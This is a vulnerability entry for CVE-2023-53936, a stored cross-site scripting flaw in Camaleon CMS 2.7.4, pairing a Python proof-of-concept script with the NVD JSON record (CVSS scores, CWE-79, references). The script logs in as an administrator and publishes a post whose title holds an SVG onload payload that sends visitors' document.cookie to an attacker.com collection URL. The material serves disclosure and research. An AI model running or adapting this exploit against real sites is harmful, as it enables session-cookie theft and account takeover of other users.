CVE-2023-53936

# CVE-2023-53936 PoC - Cameleon CMS Stored XSS via Post Title # Author: VulnCheck # Target: Cameleon CMS <= 2.7.4 import requests import json # Configuration TARGET_URL = "http://target-server/cameleon-cms" USERNAME = "admin" PASSWORD = "admin_password" # XSS Payload - SVG-based script injection XSS_PAYLOAD = '<svg onload=fetch("https://attacker.com/steal?cookie="+document.cookie)>' def login(): """Authenticate and obtain session cookie""" session = requests.Session() login_url = f"{TARGET_URL}/admin/login" data = { "authenticity_token": "", "user[username]": USERNAME, "user[password]": PASSWORD } response = session.post(login_url, data=data) return session if response.status_code == 200 else None def create_malicious_post(session): """Create post with XSS payload in title""" post_url = f"{TARGET_URL}/admin/posts" data = { "post[title]": XSS_PAYLOAD, "post[content]": "Malicious content", "post[status]": "published" } response = session.post(post_url, data=data) return response.status_code == 200 def main(): print("[*] CVE-2023-53936 PoC - Cameleon CMS Stored XSS") session = login() if session: print("[+] Login successful") if create_malicious_post(session): print("[+] Malicious post created successfully") print("[*] XSS payload will execute when users hover over post title") else: print("[-] Login failed") if __name__ == "__main__": main()

{"cve": {"id": "CVE-2023-53936", "sourceIdentifier": "[email protected]", "published": "2025-12-18T20:15:51.843", "lastModified": "2026-01-16T19:16:13.203", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cameleon CMS 2.7.4 contains a persistent cross-site scripting vulnerability that allows authenticated administrators to inject malicious scripts into post titles. Attackers can create posts with embedded SVG scripts that execute when other users mouse over the post title, potentially stealing session cookies and executing arbitrary JavaScript."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "baseScore": 4.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.7, "impactScore": 2.7}, {"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "baseScore": 4.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.7, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:tuzitio:camaleon_cms:2.7.4:*:*:*:*:*:*:*", "matchCriteriaId": "0CA4ECFC-FCEE-486E-91A6-38D7E19CBA54"}]}]}], "references": [{"url": "https://github.com/owen2345/camaleon-cms", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.exploit-db.com/exploits/51446", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://www.vulncheck.com/advisories/cameleon-cms-authenticated-persistent-cross-site-scripting-via-post-creation", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}